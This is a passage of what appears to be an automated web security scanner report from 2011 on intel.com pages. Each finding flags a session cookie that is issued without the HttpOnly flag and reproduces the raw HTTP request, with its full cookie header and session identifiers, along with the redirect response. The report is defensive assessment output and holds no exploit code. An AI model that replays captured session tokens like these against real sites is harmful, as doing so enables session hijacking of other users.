wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business/design
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:35 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=IHLMGNPAHFBCNAJEAKIGGMFL; path=/


12.94. http://www.intel.com/experience/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /experience/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /experience/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/consumer/tomorrow/index.htm
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:21:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:07 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=EBAGCODABFBKKPBGEKIPELIE; path=/


12.95. http://www.intel.com/experience/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /experience/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /experience/index.htm?iid=hdr+experience HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/consumer/tomorrow/index.htm?iid=hdr+experience
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:21:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:07 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=OLOMGNPAOJJPLJEKIDHHLFML; path=/

iid=hdr+experience

12.96. http://www.intel.com/in/business/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /in/business/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /in/business/index.htm?iid=gg_en_IN+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business?iid=gg_en_IN+noscript
Content-Length: 21
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:18:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:18:20 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=PJALKMPAJKLKFPKDNMFCNIFM; path=/

iid=gg_en_IN+noscript

12.97. http://www.intel.com/in/business/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /in/business/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /in/business/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:18:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:18:20 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=NMLFCODANKHMMOONLMFOKPDB; path=/


12.98. http://www.intel.com/intel/cr/gcr/overview.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /intel/cr/gcr/overview.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intel/cr/gcr/overview.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/corporateresponsibility/report/index.htm
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:11 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=DFOFCODADDMPDKOJANLDPAHC; path=/


12.99. http://www.intel.com/intel/cr/gcr/overview.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /intel/cr/gcr/overview.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intel/cr/gcr/overview.htm?iid=subhdr+cr_report HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/corporateresponsibility/report/index.htm?iid=subhdr+cr_report
Content-Length: 20
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:11 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=ONMMGNPAFKDBEPPANKEAFOJD; path=/

iid=subhdr+cr_report

12.100. http://www.intel.com/intel/education/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /intel/education/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intel/education/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/corporateresponsibility/education/index.htm
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:11 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=COMMGNPAMKDEGPBAGCECNLKO; path=/


12.101. http://www.intel.com/intel/education/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /intel/education/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intel/education/index.htm?iid=subhdr+cr_edu HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/corporateresponsibility/education/index.htm?iid=subhdr+cr_edu
Content-Length: 17
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=ODDLKMPAJLLLEKPMALBBNMCH; path=/

iid=subhdr+cr_edu

12.102. http://www.intel.com/intel/environment/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /intel/environment/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intel/environment/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; 